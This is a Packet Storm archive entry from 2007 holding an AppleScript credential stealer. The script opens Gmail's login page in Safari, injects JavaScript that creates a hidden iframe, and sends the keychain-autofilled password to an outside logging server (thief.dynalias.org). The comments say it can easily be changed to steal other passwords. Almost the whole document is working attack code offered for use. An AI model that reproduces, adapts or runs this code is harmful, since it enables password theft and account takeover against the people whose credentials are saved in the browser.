gmailsteal_remote.scpt.txt

2007-09-30T00:00:00
ID PACKETSTORM:59687
Type packetstorm
Reporter poplix
Modified 2007-09-30T00:00:00

Description

                                        
                                            `-- This script can be used to steal gmail's keychained password by injecting   
-- Javascripts into Safari. When executed it opens gmail's login page, reads  
-- saved password and sends it to a logging server by creating an hidden iframe  
-- into gmail's page. It can be easly modified to steal other pass.   
  
-- poplix papuasia.org -- http://px.dynalias.org -- 09-22-2007  
  
  
  
  
  
--Your logging server  
set LOGGING_URL to "http://thief.dynalias.org/log.php?p="  
  
--Creates an hidden iframe into google's login DIV  
set HIDDENFRAME to "document.getElementById('login').innerHTML+='<iframe id=steal width=0 height=0></iframe>'"   
  
--Stealing code  
set JSTEAL to "document.getElementById('steal').src='" & LOGGING_URL & "'+document.getElementById('gaia_loginform').Passwd.value"  
  
  
  
  
--Open gmail login page   
tell application "Safari"  
open location "https://www.google.com/accounts/ServiceLogin?service=mail"  
end tell  
  
--Wait loading...  
delay 10  
  
  
--Create an hidden iframe to load LOGGING_URL  
tell application "Safari"  
do JavaScript HIDDENFRAME in document 1  
end tell  
  
delay 1  
  
--Send password to LOGGING_URL  
tell application "Safari"  
do JavaScript JSTEAL in document 1  
end tell  
  
`